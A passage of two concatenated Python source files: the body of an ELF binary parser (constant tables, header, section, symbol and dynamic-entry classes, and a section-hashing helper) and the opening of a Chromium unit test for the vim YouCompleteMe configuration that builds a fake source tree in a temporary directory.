ELFOSABI_NETBSD = 2 # NetBSD
ELFOSABI_LINUX = 3 # GNU/Linux
ELFOSABI_HURD = 4 # GNU/Hurd
ELFOSABI_SOLARIS = 6 # Solaris
ELFOSABI_AIX = 7 # AIX
ELFOSABI_IRIX = 8 # IRIX
ELFOSABI_FREEBSD = 9 # FreeBSD
ELFOSABI_TRU64 = 10 # TRU64 UNIX
ELFOSABI_MODESTO = 11 # Novell Modesto
ELFOSABI_OPENBSD = 12 # OpenBSD
ELFOSABI_OPENVMS = 13 # OpenVMS
ELFOSABI_NSK = 14 # Hewlett-Packard Non-Stop Kernel
ELFOSABI_AROS = 15 # AROS
ELFOSABI_ARM_AEABI = 64 # ARM EABI
ELFOSABI_ARM = 97 # ARM
ELFOSABI_STANDALONE = 255 # Standalone (embedded) application
EI_ABIVERSION = 8 # ABI version
EI_PAD = 9 # Start of padding bytes
#===============================================================================
# Values for e_type, which identifies the object file type.
#===============================================================================
ET_NONE = 0 # No file type
ET_REL = 1 # Relocatable file
ET_EXEC = 2 # Executable file
ET_DYN = 3 # Shared object file
ET_CORE = 4 # Core file
ET_NUM = 5 # Number of defined types
ET_LOOS = 0xfe00 # Operating system-specific
ET_HIOS = 0xfeff # Operating system-specific
ET_LOPROC = 0xff00 # Processor-specific
ET_HIPROC = 0xffff # Processor-specific
#===============================================================================
# Legal values for e_machine (architecture).
#===============================================================================
EM_NONE = 0 # No machine
EM_M32 = 1 # AT&T WE 32100
EM_SPARC = 2 # SUN SPARC
EM_386 = 3 # Intel 80386
EM_68K = 4 # Motorola m68k family
EM_88K = 5 # Motorola m88k family
EM_860 = 7 # Intel 80860
EM_MIPS = 8 # MIPS R3000 big-endian
EM_S370 = 9 # IBM System/370
EM_MIPS_RS3_LE = 10 # MIPS R3000 little-endian
EM_PARISC = 15 # HPPA
EM_VPP500 = 17 # Fujitsu VPP500
EM_SPARC32PLUS = 18 # Sun's "v8plus"
EM_960 = 19 # Intel 80960
EM_PPC = 20 # PowerPC
EM_PPC64 = 21 # PowerPC 64-bit
EM_S390 = 22 # IBM S390
EM_V800 = 36 # NEC V800 series
EM_FR20 = 37 # Fujitsu FR20
EM_RH32 = 38 # TRW RH-32
EM_RCE = 39 # Motorola RCE
EM_ARM = 40 # ARM
EM_FAKE_ALPHA = 41 # Digital Alpha
EM_SH = 42 # Hitachi SH
EM_SPARCV9 = 43 # SPARC v9 64-bit
EM_TRICORE = 44 # Siemens Tricore
EM_ARC = 45 # Argonaut RISC Core
EM_H8_300 = 46 # Hitachi H8/300
EM_H8_300H = 47 # Hitachi H8/300H
EM_H8S = 48 # Hitachi H8S
EM_H8_500 = 49 # Hitachi H8/500
EM_IA_64 = 50 # Intel Merced
EM_MIPS_X = 51 # Stanford MIPS-X
EM_COLDFIRE = 52 # Motorola Coldfire
EM_68HC12 = 53 # Motorola M68HC12
EM_MMA = 54 # Fujitsu MMA Multimedia Accelerator
EM_PCP = 55 # Siemens PCP
EM_NCPU = 56 # Sony nCPU embeeded RISC
EM_NDR1 = 57 # Denso NDR1 microprocessor
EM_STARCORE = 58 # Motorola Start*Core processor
EM_ME16 = 59 # Toyota ME16 processor
EM_ST100 = 60 # STMicroelectronic ST100 processor
EM_TINYJ = 61 # Advanced Logic Corp. Tinyj emb.fam
EM_X86_64 = 62 # AMD x86-64 architecture
EM_PDSP = 63 # Sony DSP Processor
EM_FX66 = 66 # Siemens FX66 microcontroller
EM_ST9PLUS = 67 # STMicroelectronics ST9+ 8/16 mc
EM_ST7 = 68 # STmicroelectronics ST7 8 bit mc
EM_68HC16 = 69 # Motorola MC68HC16 microcontroller
EM_68HC11 = 70 # Motorola MC68HC11 microcontroller
EM_68HC08 = 71 # Motorola MC68HC08 microcontroller
EM_68HC05 = 72 # Motorola MC68HC05 microcontroller
EM_SVX = 73 # Silicon Graphics SVx
EM_ST19 = 74 # STMicroelectronics ST19 8 bit mc
EM_VAX = 75 # Digital VAX
EM_CRIS = 76 # Axis Communications 32-bit embedded processor
EM_JAVELIN = 77 # Infineon Technologies 32-bit embedded processor
EM_FIREPATH = 78 # Element 14 64-bit DSP Processor
EM_ZSP = 79 # LSI Logic 16-bit DSP Processor
EM_MMIX = 80 # Donald Knuth's educational 64-bit processor
EM_HUANY = 81 # Harvard University machine-independent object files
EM_PRISM = 82 # SiTera Prism
EM_AVR = 83 # Atmel AVR 8-bit microcontroller
EM_FR30 = 84 # Fujitsu FR30
EM_D10V = 85 # Mitsubishi D10V
EM_D30V = 86 # Mitsubishi D30V
EM_V850 = 87 # NEC v850
EM_M32R = 88 # Mitsubishi M32R
EM_MN10300 = 89 # Matsushita MN10300
EM_MN10200 = 90 # Matsushita MN10200
EM_PJ = 91 # picoJava
EM_OPENRISC = 92 # OpenRISC 32-bit embedded processor
EM_ARC_A5 = 93 # ARC Cores Tangent-A5
EM_XTENSA = 94 # Tensilica Xtensa Architecture
EM_ALTERA_NIOS2 = 113 # Altera Nios II
EM_AARCH64 = 183 # ARM AARCH64
EM_TILEPRO = 188 # Tilera TILEPro
EM_MICROBLAZE = 189 # Xilinx MicroBlaze
EM_TILEGX = 191 # Tilera TILE-Gx
EM_NUM = 192 #
#===============================================================================
# Values for e_version (version).
#===============================================================================
EV_NONE = 0 # Invalid ELF version
EV_CURRENT = 1 # Current version
EV_NUM = 2 #
#===============================================================================
# Special section indices, which may show up in st_shndx fields
#===============================================================================
SHN_UNDE = 0 # Undefined section
SHN_LORESERVE = 0xff00 # Begin range of reserved indices
SHN_LOPROC = 0xff00 # Begin range of appl-specific
SHN_HIPROC = 0xff1f # End range of appl-specific
SHN_LOOS = 0xff20 # OS specific semantics, lo
SHN_HIOS = 0xff3f # OS specific semantics, hi
SHN_ABS = 0xfff1 # Associated symbol is absolute
SHN_COMMON = 0xfff2 # Associated symbol is in common
SHN_XINDEX = 0xffff # Section index is held elsewhere
SHN_HIRESERVE = 0xffff # End range of reserved indices
#===============================================================================
# Values for sh_type (section type).
#===============================================================================
SHT_NULL = 0 # Section header table entry unused
SHT_PROGBITS = 1 # Program specific (private) data
SHT_SYMTAB = 2 # Link editing symbol table
SHT_STRTAB = 3 # A string table
SHT_RELA = 4 # Relocation entries with addends
SHT_HASH = 5 # A symbol hash table
SHT_DYNAMIC = 6 # Information for dynamic linking
SHT_NOTE = 7 # Information that marks file
SHT_NOBITS = 8 # Section occupies no space in file
SHT_REL = 9 # Relocation entries, no addends
SHT_SHLIB = 10 # Reserved, unspecified semantics
SHT_DYNSYM = 11 # Dynamic linking symbol table
SHT_INIT_ARRAY = 14 # Array of ptrs to init functions
SHT_FINI_ARRAY = 15 # Array of ptrs to finish functions
SHT_PREINIT_ARRAY = 16 # Array of ptrs to pre-init funcs
SHT_GROUP = 17 # Section contains a section group
SHT_SYMTAB_SHNDX = 18 # Indicies for SHN_XINDEX entries
SHT_LOOS = 0x60000000 # First of OS specific semantics
SHT_HIOS = 0x6fffffff # Last of OS specific semantics
SHT_LOPROC = 0x70000000 # Processor-specific semantics, lo
SHT_HIPROC = 0x7fffffff # Processor-specific semantics, hi
SHT_LOUSER = 0x80000000 # Application-specific semantics
SHT_HIUSER = 0xffffffff # Application-specific semantics
SHT_GNU_ATTRIBUTES = 0x6ffffff5 # Object attributes
SHT_GNU_HASH = 0x6ffffff6 # GNU style symbol hash table
SHT_GNU_LIBLIST = 0x6ffffff7 # List of prelink dependencies
SHT_GNU_verdef = 0x6ffffffd # Versions defined by file
SHT_GNU_verneed = 0x6ffffffe # Versions needed by file
SHT_GNU_versym = 0x6fffffff # Symbol versions
#===============================================================================
# Values for sh_flags (section flags)
#===============================================================================
SHF_WRITE = (1 << 0) # Writable data during execution
SHF_ALLOC = (1 << 1) # Occupies memory during execution
SHF_EXECINSTR = (1 << 2) # Executable machine instructions
SHF_MERGE = (1 << 4) # Data in this section can be merged
SHF_STRINGS = (1 << 5) # Contains null terminated character strings
SHF_INFO_LINK = (1 << 6) # sh_info holds section header table index
SHF_LINK_ORDER = (1 << 7) # Preserve section ordering when linking
SHF_OS_NONCONFORMING = (1 << 8) # OS specific processing required
SHF_GROUP = (1 << 9) # Member of a section group
SHF_TLS = (1 << 10) # Thread local storage section
SHF_MASKOS = 0x0ff00000 # OS-specific semantics
SHF_MASKPROC = 0xf0000000 # Processor-specific semantics
#===============================================================================
# Values for p_type (segment type).
#===============================================================================
PT_NULL = 0 # Program header table entry unused
PT_LOAD = 1 # Loadable program segment
PT_DYNAMIC = 2 # Dynamic linking information
PT_INTERP = 3 # Program interpreter
PT_NOTE = 4 # Auxiliary information
PT_SHLIB = 5 # Reserved
PT_PHDR = 6 # Entry for header table itself
PT_TLS = 7 # Thread-local storage segment
PT_NUM = 8 # Number of defined types
PT_LOOS = 0x60000000 # Start of OS-specific
PT_HIOS = 0x6fffffff # End of OS-specific
PT_LOPROC = 0x70000000 # Start of processor-specific
PT_HIPROC = 0x7fffffff # End of processor-specific
PT_GNU_EH_FRAME = 0x6474e550 # GCC .eh_frame_hdr segment
PT_GNU_STACK = 0x6474e551 # Indicates stack executability
PT_GNU_RELRO = 0x6474e552 # Read-only after relocation
#===============================================================================
# Values for p_flags (segment flags).
#===============================================================================
PF_X = (1 << 0) # Segment is executable
PF_W = (1 << 1) # Segment is writable
PF_R = (1 << 2) # Segment is readable
PF_MASKOS = 0x0ff00000 # OS-specific
PF_MASKPROC = 0xf0000000 # Processor-specific
#===============================================================================
# Values for ST_BIND subfield of st_info (symbol binding).
#===============================================================================
STB_LOCAL = 0 # Local symbol
STB_GLOBAL = 1 # Global symbol
STB_WEAK = 2 # Weak symbol
STB_NUM = 3 # Number of defined types
STB_LOOS = 10 # Start of OS-specific
STB_HIOS = 12 # End of OS-specific
STB_LOPROC = 13 # Start of processor-specific
STB_HIPROC = 15 # End of processor-specific
STB_GNU_UNIQUE = 10 # Unique symbol
#===============================================================================
# Values for ST_TYPE subfield of st_info (symbol type).
#===============================================================================
STT_NOTYPE = 0 # Symbol type is unspecified
STT_OBJECT = 1 # Symbol is a data object
STT_FUNC = 2 # Symbol is a code object
STT_SECTION = 3 # Symbol associated with a section
STT_FILE = 4 # Symbol's name is file name
STT_COMMON = 5 # Symbol is a common data object
STT_TLS = 6 # Symbol is thread-local data object
STT_NUM = 7 # Number of defined types
STT_LOOS = 10 # Start of OS-specific
STT_HIOS = 12 # End of OS-specific
STT_LOPROC = 13 # Start of processor-specific
STT_HIPROC = 15 # End of processor-specific
STT_GNU_IFUNC = 10 # Symbol is indirect code object
#===============================================================================
# Symbol visibility specification encoded in the st_other field.
#===============================================================================
STV_DEFAULT = 0 # Default symbol visibility rules
STV_INTERNAL = 1 # Processor specific hidden class
STV_HIDDEN = 2 # Sym unavailable in other modules
STV_PROTECTED = 3 # Not preemptible, not exported
#===============================================================================
# Values for d_tag (dynamic entry type).
#===============================================================================
DT_NULL = 0 # Marks end of dynamic section
DT_NEEDED = 1 # Name of needed library
DT_PLTRELSZ = 2 # Size in bytes of PLT relocs
DT_PLTGOT = 3 # Processor defined value
DT_HASH = 4 # Address of symbol hash table
DT_STRTAB = 5 # Address of string table
DT_SYMTAB = 6 # Address of symbol table
DT_RELA = 7 # Address of Rela relocs
DT_RELASZ = 8 # Total size of Rela relocs
DT_RELAENT = 9 # Size of one Rela reloc
DT_STRSZ = 10 # Size of string table
DT_SYMENT = 11 # Size of one symbol table entry
DT_INIT = 12 # Address of init function
DT_FINI = 13 # Address of termination function
DT_SONAME = 14 # Name of shared object
DT_RPATH = 15 # Library search path (deprecated)
DT_SYMBOLIC = 16 # Start symbol search here
DT_REL = 17 # Address of Rel relocs
DT_RELSZ = 18 # Total size of Rel relocs
DT_RELENT = 19 # Size of one Rel reloc
DT_PLTREL = 20 # Type of reloc in PLT
DT_DEBUG = 21 # For debugging; unspecified
DT_TEXTREL = 22 # Reloc might modify .text
DT_JMPREL = 23 # Address of PLT relocs
DT_BIND_NOW = 24 # Process relocations of object
DT_INIT_ARRAY = 25 # Array with addresses of init fct
DT_FINI_ARRAY = 26 # Array with addresses of fini fct
DT_INIT_ARRAYSZ = 27 # Size in bytes of DT_INIT_ARRAY
DT_FINI_ARRAYSZ = 28 # Size in bytes of DT_FINI_ARRAY
DT_RUNPATH = 29 # Library search path
DT_FLAGS = 30 # Flags for the object being loaded
DT_ENCODING = 32 # Start of encoded range
DT_PREINIT_ARRAY = 32 # Array with addresses of preinit fct
DT_PREINIT_ARRAYSZ = 33 # size in bytes of DT_PREINIT_ARRAY
DT_NUM = 34 # Number used
DT_LOOS = 0x6000000d # Start of OS-specific
DT_HIOS = 0x6ffff000 # End of OS-specific
DT_LOPROC = 0x70000000 # Start of processor-specific
DT_HIPROC = 0x7fffffff # End of processor-specific
# Versioning entry types. Defined as part of the GNU extension.
DT_VERSYM = 0x6ffffff0 #
DT_RELACOUNT = 0x6ffffff9 #
DT_RELCOUNT = 0x6ffffffa #
DT_FLAGS_1 = 0x6ffffffb # State flags, see DF_1_* below.
DT_VERDEF = 0x6ffffffc # Address of version definition table
DT_VERDEFNUM = 0x6ffffffd # Number of version definitions
DT_VERNEED = 0x6ffffffe # Address of table with needed versions
DT_VERNEEDNUM = 0x6fffffff # Number of needed versions
#===============================================================================
# Values of d_val in the DT_FLAGS entry.
#===============================================================================
DF_ORIGIN = 0x00000001 # Object may use DF_ORIGIN
DF_SYMBOLIC = 0x00000002 # Symbol resolutions starts here
DF_TEXTREL = 0x00000004 # Object contains text relocations
DF_BIND_NOW = 0x00000008 # No lazy binding for this object
DF_STATIC_TLS = 0x00000010 # Module uses the static TLS model
#===============================================================================
# State flags selectable in the d_val element of the DT_FLAGS_1 entry.
#===============================================================================
DF_1_NOW = 0x00000001 # Set RTLD_NOW for this object.
DF_1_GLOBAL = 0x00000002 # Set RTLD_GLOBAL for this object.
DF_1_GROUP = 0x00000004 # Set RTLD_GROUP for this object.
DF_1_NODELETE = 0x00000008 # Set RTLD_NODELETE for this object.
DF_1_LOADFLTR = 0x00000010 # Trigger filtee loading at runtime.
DF_1_INITFIRST = 0x00000020 # Set RTLD_INITFIRST for this object
DF_1_NOOPEN = 0x00000040 # Set RTLD_NOOPEN for this object.
DF_1_ORIGIN = 0x00000080 # $ORIGIN must be handled.
DF_1_DIRECT = 0x00000100 # Direct binding enabled.
DF_1_TRANS = 0x00000200 #
DF_1_INTERPOSE = 0x00000400 # Object is used to interpose.
DF_1_NODEFLIB = 0x00000800 # Ignore default lib search path.
DF_1_NODUMP = 0x00001000 # Object can't be dldump'ed.
DF_1_CONFALT = 0x00002000 # Configuration alternative created.
DF_1_ENDFILTEE = 0x00004000 # Filtee terminates filters search.
DF_1_DISPRELDNE = 0x00008000 # Disp reloc applied at build time.
DF_1_DISPRELPND = 0x00010000 # Disp reloc applied at run-time.
#===============================================================================
# ARM specific declarations
#===============================================================================
EF_ARM_ABI_FLOAT_SOFT = 0x200
EF_ARM_ABI_FLOAT_HARD = 0x400
EF_ARM_EABIMASK = 0xff000000
EF_ARM_EABI_UNKNOWN = 0x00000000
EF_ARM_EABI_VER1 = 0x01000000
EF_ARM_EABI_VER2 = 0x02000000
EF_ARM_EABI_VER3 = 0x03000000
EF_ARM_EABI_VER4 = 0x04000000
EF_ARM_EABI_VER5 = 0x05000000
#===============================================================================
#===============================================================================
class ElfError(Exception):
pass
#===============================================================================
# The ELF file header. This appears at the start of every ELF file.
#===============================================================================
class ElfEhdr(object):
size32 = 52
size64 = 64
def __init__(self, buf):
# Read e_ident first so we can get information
self.e_ident = struct.unpack("%dB" % EI_NIDENT, buf[0:EI_NIDENT])
if self.e_ident[EI_MAG0] != ELFMAG0 \
or self.e_ident[EI_MAG1] != ELFMAG1 \
or self.e_ident[EI_MAG2] != ELFMAG2 \
or self.e_ident[EI_MAG3] != ELFMAG3:
raise ElfError("Bad magic in Ehdr")
# Check encoding
if not self.isLSB() or self.isMSB():
raise ElfError("Bad encoding in Ehdr")
# Setup format based on class
if self.is32Bit():
fmt = self.getFmtPrefix() + "HHIIIIIHHHHHH"
self.size = ElfEhdr.size32
elif self.is64Bit():
fmt = self.getFmtPrefix() + "HHIQQQIHHHHHH"
self.size = ElfEhdr.size64
else:
raise ElfError("Bad class in Ehdr")
# Save fields (same order for 32-bit/64-bit)
fields = struct.unpack(fmt, buf[EI_NIDENT:self.size])
self.e_type = fields[0] # Object file type
self.e_machine = fields[1] # Architecture
self.e_version = fields[2] # Object file version
self.e_entry = fields[3] # Entry point virtual address
self.e_phoff = fields[4] # Program header table file offset
self.e_shoff = fields[5] # Section header table file offset
self.e_flags = fields[6] # Processor-specific flags
self.e_ehsize = fields[7] # ELF header size in bytes
self.e_phentsize = fields[8] # Program header table entry size
self.e_phnum = fields[9] # Program header table entry count
self.e_shentsize = fields[10] # Section header table entry size
self.e_shnum = fields[11] # Section header table entry count
self.e_shstrndx = fields[12] # Section header string table index
def isLSB(self):
return self.e_ident[EI_DATA] == ELFDATA2LSB
def isMSB(self):
return self.e_ident[EI_DATA] == ELFDATA2MSB
def is32Bit(self):
return self.e_ident[EI_CLASS] == ELFCLASS32
def is64Bit(self):
return self.e_ident[EI_CLASS] == ELFCLASS64
def getFmtPrefix(self):
return "<" if self.isLSB() else ">"
def __str__(self):
return \
"{e_type=0x%x, e_machine=0x%x, e_version=0x%x, e_entry=0x%x, " \
"e_phoff=0x%x, e_shoff=0x%x, e_flags=0x%x, e_ehsize=0x%x, " \
"e_phentsize=0x%x, e_phnum=0x%x, e_shentsize=0x%x, " \
"e_shnum=0x%x, e_shstrndx=0x%x}" % \
(self.e_type, self.e_machine, self.e_version, self.e_entry,
self.e_phoff, self.e_shoff, self.e_flags, self.e_ehsize,
self.e_phentsize, self.e_phnum, self.e_shentsize,
self.e_shnum, self.e_shstrndx)
#===============================================================================
# Section header.
#===============================================================================
class ElfShdr(object):
size32 = 40
size64 = 64
def __init__(self, elf, idx, buf):
self.idx = idx
self.namestr = None
# Setup format
if elf.ehdr.is32Bit():
fmt = elf.ehdr.getFmtPrefix() + "IIIIIIIIII"
self.size = ElfPhdr.size32
else:
fmt = elf.ehdr.getFmtPrefix() + "IIQQQQIIQQ"
self.size = ElfPhdr.size64
# Save fields (same order for 32-bit/64-bit)
fields = struct.unpack(fmt, buf)
self.sh_name = fields[0] # Section name (string tbl index)
self.sh_type = fields[1] # Section type
self.sh_flags = fields[2] # Section flags
self.sh_addr = fields[3] # Section virtual addr at execution
self.sh_offset = fields[4] # Section file offset
self.sh_size = fields[5] # Section size in bytes
self.sh_link = fields[6] # Link to another section
self.sh_info = fields[7] # Additional section information
self.sh_addralign = fields[8] # Section alignment
self.sh_entsize = fields[9] # Entry size if section holds table
def __str__(self):
return \
"{sh_name=0x%x, sh_type=0x%x, sh_flags=0x%x, sh_addr=0x%x, " \
"sh_offset=0x%x, sh_size=0x%x, sh_link=0x%x, sh_info=0x%x, " \
"sh_addralign=0x%x, sh_entsize=0x%x, namestr='%s'}" % \
(self.sh_name, self.sh_type, self.sh_flags, self.sh_addr,
self.sh_offset, self.sh_size, self.sh_link, self.sh_info,
self.sh_addralign, self.sh_entsize, self.namestr)
#===============================================================================
# Program segment header.
#===============================================================================
class ElfPhdr(object):
size32 = 32
size64 = 56
def __init__(self, elf, idx, buf):
self.idx = idx
# Setup format
if elf.ehdr.is32Bit():
fmt = elf.ehdr.getFmtPrefix() + "IIIIIIII"
self.size = ElfPhdr.size32
else:
fmt = elf.ehdr.getFmtPrefix() + "IIQQQQQQ"
self.size = ElfPhdr.size64
# Save fields (order depends on 32-bit/64-bit)
fields = struct.unpack(fmt, buf)
if elf.ehdr.is32Bit():
self.p_type = fields[0] # Segment type
self.p_offset = fields[1] # Segment file offset
self.p_vaddr = fields[2] # Segment virtual address
self.p_paddr = fields[3] # Segment physical address
self.p_filesz = fields[4] # Segment size in file
self.p_memsz = fields[5] # Segment size in memory
self.p_flags = fields[6] # Segment flags
self.p_align = fields[7] # Segment alignment
else:
self.p_type = fields[0] # Segment type
self.p_flags = fields[1] # Segment flags
self.p_offset = fields[2] # Segment file offset
self.p_vaddr = fields[3] # Segment virtual address
self.p_paddr = fields[4] # Segment physical address
self.p_filesz = fields[5] # Segment size in file
self.p_memsz = fields[6] # Segment size in memory
self.p_align = fields[7] # Segment alignment
def __str__(self):
return \
"{p_type=0x%x, p_offset=0x%x, p_vaddr=0x%x, p_paddr=0x%x, " \
"p_filesz=0x%x, p_memsz=0x%x, p_flags=0x%x, p_align=0x%x}" % \
(self.p_type, self.p_offset, self.p_vaddr, self.p_paddr,
self.p_filesz, self.p_memsz, self.p_flags, self.p_align)
#===============================================================================
#===============================================================================
class ElfSym(object):
size32 = 16
size64 = 24
def __init__(self, elf, idx, buf):
self.idx = idx
self.namestr = None
# Setup format
if elf.ehdr.is32Bit():
fmt = elf.ehdr.getFmtPrefix() + "IIIBBH"
self.size = ElfSym.size32
else:
fmt = elf.ehdr.getFmtPrefix() + "IBBHQQ"
self.size = ElfSym.size64
# Save fields (order depends on 32-bit/64-bit)
fields = struct.unpack(fmt, buf)
if elf.ehdr.is32Bit():
self.st_name = fields[0] # Symbol name (string tbl index)
self.st_value = fields[1] # Symbol value
self.st_size = fields[2] # Symbol size
self.st_info = fields[3] # Symbol type and binding
self.st_other = fields[4] # Symbol visibility
self.st_shndx = fields[5] # Section index
else:
self.st_name = fields[0] # Symbol name (string tbl index)
self.st_info = fields[1] # Symbol type and binding
self.st_other = fields[2] # Symbol visibility
self.st_shndx = fields[3] # Section index
self.st_value = fields[4] # Symbol value
self.st_size = fields[5] # Symbol size
self.st_type = self.st_info&0xf
self.st_bind = (self.st_info>>4)&0xf
self.st_visibility = self.st_other&0x3
def __str__(self):
return \
"{st_name=0x%x, st_value=0x%x, st_size=0x%x, st_type=0x%x, " \
"st_bind=0x%x, st_visibility=0x%x, st_shndx=0x%x, namestr='%s'}" % \
(self.st_name, self.st_value, self.st_size, self.st_type,
self.st_bind, self.st_visibility, self.st_shndx, self.namestr)
#===============================================================================
#===============================================================================
class ElfDyn(object):
size32 = 8
size64 = 16
strTags = [DT_NEEDED, DT_SONAME, DT_RPATH, DT_RUNPATH]
def __init__(self, elf, idx, buf):
self.idx = idx
self.valstr = None
# Setup format
if elf.ehdr.is32Bit():
fmt = elf.ehdr.getFmtPrefix() + "II"
self.size = ElfDyn.size32
else:
fmt = elf.ehdr.getFmtPrefix() + "QQ"
self.size = ElfDyn.size64
# Save fields
fields = struct.unpack(fmt, buf)
self.d_tag = fields[0]
self.d_val = fields[1]
def __str__(self):
if self.valstr is not None:
return "{d_tag=0x%x, d_val=0x%x, valstr='%s'}" % \
(self.d_tag, self.d_val, self.valstr)
else:
return "{d_tag=0x%x, d_val=0x%x}" % \
(self.d_tag, self.d_val)
#===============================================================================
#===============================================================================
class Elf(object):
def __init__(self):
self.ehdr = None
self.phdrTable = []
self.shdrTable = []
self.symTable = []
self.dynsymTable = []
self.dynamicEntries = []
self._data = None
def loadFromFile(self, filePath):
elfFile = None
try:
# Open file, map it in memory and start reading it
elfFile = open(filePath, "rb")
self._data = mmap.mmap(elfFile.fileno(), 0, access=mmap.ACCESS_READ)
self._read()
except struct.error as ex:
raise ElfError(str(ex))
finally:
# In any case, close file
if elfFile:
elfFile.close()
def close(self):
if self._data:
self._data.close()
self._data = None
def _read(self):
self._readEhdr()
self._readPhdrTable()
self._readShdrTable()
for shdr in self.shdrTable:
shdr.namestr = self._getString(self.ehdr.e_shstrndx, shdr.sh_name)
if shdr.sh_type == SHT_SYMTAB:
self._readSymTable(shdr, self.symTable)
elif shdr.sh_type == SHT_DYNSYM:
self._readSymTable(shdr, self.dynsymTable)
elif shdr.sh_type == SHT_DYNAMIC:
self._readDynamicSection(shdr)
def _readEhdr(self):
# Give all data, we don't known yet which size to give
self.ehdr = ElfEhdr(self._data)
def _readPhdrTable(self):
size = ElfPhdr.size32 if self.ehdr.is32Bit() else ElfPhdr.size64
for i in range(0, self.ehdr.e_phnum):
offset = self.ehdr.e_phoff + i*self.ehdr.e_phentsize
phdr = ElfPhdr(self, i, self._data[offset:offset+size])
self.phdrTable.append(phdr)
def _readShdrTable(self):
size = ElfShdr.size32 if self.ehdr.is32Bit() else ElfShdr.size64
for i in range(0, self.ehdr.e_shnum):
offset = self.ehdr.e_shoff + i*self.ehdr.e_shentsize
shdr = ElfShdr(self, i, self._data[offset:offset+size])
self.shdrTable.append(shdr)
def _readSymTable(self, shdr, table):
size = ElfSym.size32 if self.ehdr.is32Bit() else ElfSym.size64
for i in range(0, shdr.sh_size//size):
offset = shdr.sh_offset + i*size
sym = ElfSym(self, i, self._data[offset:offset+size])
sym.namestr = self._getString(shdr.sh_link, sym.st_name)
table.append(sym)
def _readDynamicSection(self, shdr):
size = ElfDyn.size32 if self.ehdr.is32Bit() else ElfDyn.size64
for i in range(0, shdr.sh_size//size):
offset = shdr.sh_offset + i*size
dyn = ElfDyn(self, i, self._data[offset:offset+size])
if dyn.d_tag in ElfDyn.strTags:
dyn.valstr = self._getString(shdr.sh_link, dyn.d_val)
self.dynamicEntries.append(dyn)
if dyn.d_tag == DT_NULL:
break
def _getString(self, idx, offset):
if idx >= len(self.shdrTable):
return None
shdrStr = self.shdrTable[idx]
if offset >= shdrStr.sh_size:
return None
start = shdrStr.sh_offset + offset
end = self._data.find(b"\x00", start, start + shdrStr.sh_size)
if end == -1:
end = start + shdrStr.sh_size
return self._data[start:end].decode("UTF-8")
# Compute hash of elf for section that are loadable and with data in elf.
# @param hash : an object from 'hashlib' that support 'update' and
# 'hexdigest' methods.
def computeHash(self, hash):
for shdr in self.shdrTable:
if (shdr.sh_flags&SHF_ALLOC) != 0 and shdr.sh_type != SHT_NOBITS:
start = shdr.sh_offset
end = shdr.sh_offset + shdr.sh_size
hash.update(self._data[start:end])
return hash.hexdigest()
def getSection(self, name):
for shdr in self.shdrTable:
if shdr.namestr == name:
return shdr
return None
def getSectionData(self, shdr):
return self._data[shdr.sh_offset:shdr.sh_offset+shdr.sh_size]
def hasSection(self, name):
return self.getSection(name) is not None
def __str__(self):
return "\n".join(["ehdr=%s" % self.ehdr] + \
["phdr[%d]=%s" % (phdr.idx, phdr) for phdr in self.phdrTable] + \
["shdr[%d]=%s" % (shdr.idx, shdr) for shdr in self.shdrTable] + \
["sym[%d]=%s" % (sym.idx, sym) for sym in self.symTable] + \
["dynsym[%d]=%s" % (sym.idx, sym) for sym in self.dynsymTable])
#===============================================================================
# For test.
#===============================================================================
if __name__ == "__main__":
def main():
import sys
import hashlib
try:
elf = Elf()
elf.loadFromFile(sys.argv[1])
print(elf)
print("md5:%s" % elf.computeHash(hashlib.md5())) # IGNORE:E1101
print("sha1:%s" % elf.computeHash(hashlib.sha1())) # IGNORE:E1101
elf.close()
except ElfError as ex:
print(ex)
main()
|
|
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for chromium.ycm_extra_conf.
These tests should be getting picked up by the PRESUBMIT.py in /tools/vim.
Currently the tests only run on Linux and require 'ninja' to be available on
PATH. Due to these requirements, the tests should only be run on upload.
"""
import imp
import os
import shutil
import stat
import string
import subprocess
import sys
import tempfile
import unittest
def CreateFile(path,
copy_from = None,
format_with = None,
make_executable = False):
"""Creates a file.
If a file already exists at |path|, it will be overwritten.
Args:
path: (String) Absolute path for file to be created.
copy_from: (String or None) Absolute path to source file. If valid, the
contents of this file will be written to |path|.
format_with: (Dictionary or None) Only valid if |copy_from| is also valid.
The contents of the file at |copy_from| will be passed through
string.Formatter.vformat() with this parameter as the dictionary.
make_executable: (Boolean) If true, |file| will be made executable.
"""
if not os.path.isabs(path):
raise Exception(
'Argument |path| needs to be an absolute path. Got: "{}"'.format(path))
with open(path, 'w') as f:
if copy_from:
with open(copy_from, 'r') as source:
contents = source.read()
if format_with:
formatter = string.Formatter()
contents = formatter.vformat(contents, None, format_with)
f.write(contents)
if make_executable:
statinfo = os.stat(path)
os.chmod(path, statinfo.st_mode | stat.S_IXUSR)
class Chromium_ycmExtraConfTest(unittest.TestCase):
def SetUpFakeChromeTreeBelowPath(self):
"""Create fake Chromium source tree under self.test_root.
The fake source tree has the following contents:
<self.test_root>
| .gclient
|
+-- src
| | DEPS
| | three.cc
| |
| +-- .git
|
+-- out
|
+-- gn
build.ninja
"""
self.chrome_root = os.path.abspath(os.path.normpath(
os.path.join(self.test_root, 'src')))
self.out_dir = os.path.join(self.chrome_root, 'out', 'gn')
os.makedirs(self.chrome_root)
os.makedirs(os.path.join(self.chrome_root, '.git'))
os.makedirs(self.out_dir)
CreateFile(os.path.join(self.test_root, '.gclient'))
CreateFile(os.path.join(self.chrome_root, 'DEPS'))
CreateFile(os.path.join(self.chrome_root, 'three.cc'))
# Fake ninja build file. Applications of 'cxx' rule are tagged by which
# source file was used as input so that the test can verify that the correct
# build dependency was used.
CreateFile(os.path.join(self.out_dir, 'build.ninja'),
copy_from=os.path.join(self.test_data_path,
'fake_build_ninja.txt'))
def NormalizeString(self, string):
return string.replace(self.out_dir, '[OUT]').\
replace(self.chrome_root, '[SRC]').replace('\\', '/')
def NormalizeStringsInList(self, list_of_strings):
return [self.NormalizeString(s) for s in list_of_strings]
def setUp(self):
self.actual_chrome_root = os.path.normpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../..'))
sys.path.append(os.path.join(self.actual_chrome_root, 'tools', 'vim'))
self.test_data_path = os.path.join(self.actual_chrome_root, 'tools', 'vim',
'tests', 'data')
self.ycm_extra_conf = imp.load_source('ycm_extra_conf',
'chromium.ycm_extra_conf.py')
self.test_root = tempfile.mkdtemp()
self.SetUpFakeChromeTreeBelowPath()
def tearDown(self):
if self.test_root:
shutil.rmtree(self.test_root)
